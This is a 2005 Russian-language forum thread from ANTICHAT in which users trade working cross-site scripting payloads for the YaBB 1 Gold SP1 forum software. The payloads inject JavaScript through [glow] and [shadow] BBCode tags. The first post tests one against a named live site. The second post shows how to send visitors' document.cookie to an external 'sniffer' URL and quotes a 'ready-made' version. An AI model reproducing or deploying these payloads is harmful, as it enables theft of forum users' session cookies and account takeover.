HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Уязвимость, YaBB 1 Gold - SP1, XSS атака.
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость, YaBB 1 Gold - SP1, XSS атака.
  #1  
Старый 13.12.2005, 00:18
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию Уязвимость, YaBB 1 Gold - SP1, XSS атака.
Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]
или

Код:
[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
Что не так в этом коде, проверял на http://www.mgapi.ru/cgi-bin/yabb/
Код:
[glow=red);background:url(javascript:img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,300]Big Exploit[/glow]
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Romaxa55; 13.12.2005 в 00:55..
 

  #2  
Старый 13.12.2005, 00:39
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию
Так. Ну это алерт, а тебе нужно, чтобы приходили куки на сниффер, да? Ну тогда подумай головой=)) Нужно вместо
Код HTML:
alert(document.cookie)
вставить свой код. К примеру,
Код HTML:
document.location.href='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie
Но это только пример=)) Попробуй, может получится-)
Не забываем про РЕПУТАЦИЮ!

Цитата:
Код HTML:
[glow=red);background:url(javascript:new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,3  00]Big Exploit[/glow]
Это уже готовое.

И не надо изподтишка сообщение редактировать, ок? Я ответил на вопрос, уже новым сообщением пиши, а не редактируй старое!
Последний раз редактировалось FQziT; 13.12.2005 в 00:57..
 

  #3  
Старый 13.12.2005, 00:57
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию
Да спасиб, но проблемма в том что, нет знаний в этой области, вот токо начал изучать.. ща попробую что нить.. Спасиб
 

  #4  
Старый 13.12.2005, 01:04
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию
Romaxa55 Всегда пожалуйста=)
 

  #5  
Старый 13.12.2005, 01:25
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию
Думаю тема закрыта, еще раз спасибо FQziT
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Атака SMURF - наиболее опасная разновидность атаки DDoS dinar_007 Болталка 7 14.01.2008 07:10
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости. Обсуждения. 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости. Обсуждения. 0 02.10.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.